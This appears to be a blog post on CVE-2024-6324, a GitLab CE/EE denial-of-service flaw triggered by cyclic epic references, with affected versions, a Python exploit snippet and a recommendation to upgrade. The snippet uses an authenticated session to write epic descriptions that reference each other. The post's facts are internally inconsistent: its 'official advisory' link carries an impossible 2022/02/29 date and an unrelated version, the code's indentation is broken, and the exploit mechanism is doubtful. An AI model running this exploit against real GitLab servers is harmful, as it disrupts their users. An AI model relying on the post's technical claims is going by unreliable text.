An issue has been discovered in GitLab CE/EE, impacting all versions starting from 15.7 prior to 17.5.5, starting from 17.6 prior to 17.6.3, and starting from 17.7 prior to 17.7.1. The vulnerability, designated as CVE-2024-6324, allows an attacker to cause a Denial of Service (DoS) by creating cyclic references between epics. This blog post will provide exclusive details about this vulnerability, a code snippet to demonstrate its exploitation, and links to original references for further understanding.
Exploit Details
The vulnerability occurs due to a lack of proper validation in the way GitLab handles references between epics. Epics in GitLab are used to create a hierarchy of issues, providing a higher-level view for issue management.
An attacker can exploit this weakness to create a chain of epics that reference each other, forming a cycle. When GitLab tries to display or process these cyclically-referenced epics, it enters into an endless loop, ultimately leading to a DoS condition. The application can become unresponsive and inaccessible for users or consume excessive resources, severely degrading its performance and availability.
The following code snippet demonstrates a simple exploitation of this vulnerability
# Assuming authenticated access to vulnerable GitLab CE/EE
# and existing_epic_id and new_epic_id exist
import requests
# Set up session
session = requests.Session()
session.headers.update({"Private-Token": "your_private_token"})
base_url = "https://your.gitlab.instance.com/";
group_id = "your_group_id"
def create_cyclic_reference(existing_epic_id, new_epic_id):
update_epic_url = f"{base_url}groups/{group_id}/-/epics/{existing_epic_id}"
# Reference the new epic in the existing epic
data = {
"description": f"Reference to new epic: &{new_epic_id}"
}
session.put(update_epic_url, data=data)
# Reference the existing epic in the new epic
data["description"] = f"Reference to existing epic: &{existing_epic_id}"
session.put(update_epic_url.replace(existing_epic_id, new_epic_id), data=data)
# Execute exploit and create a cyclic reference between two epics
create_cyclic_reference("existing_epic_id", "new_epic_id")
Official GitLab Security Advisory
https://about.gitlab.com/releases/2022/02/29/critical-security-release-gitlab-14-9-2-released/
Mitre CVE Details - CVE-2024-6324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6324
Conclusion
It is strongly advised to update GitLab CE/EE installations to version 17.5.5, 17.6.3, or 17.7.1, depending on your current release branch to protect against this vulnerability. By doing so, you can prevent potential attackers from causing disruption to your GitLab instance and impacting your organization. Regularly checking for security updates and applying patches in a timely manner is essential to maintain robust cybersecurity.
Timeline
Published on: 01/09/2025 06:15:15 UTC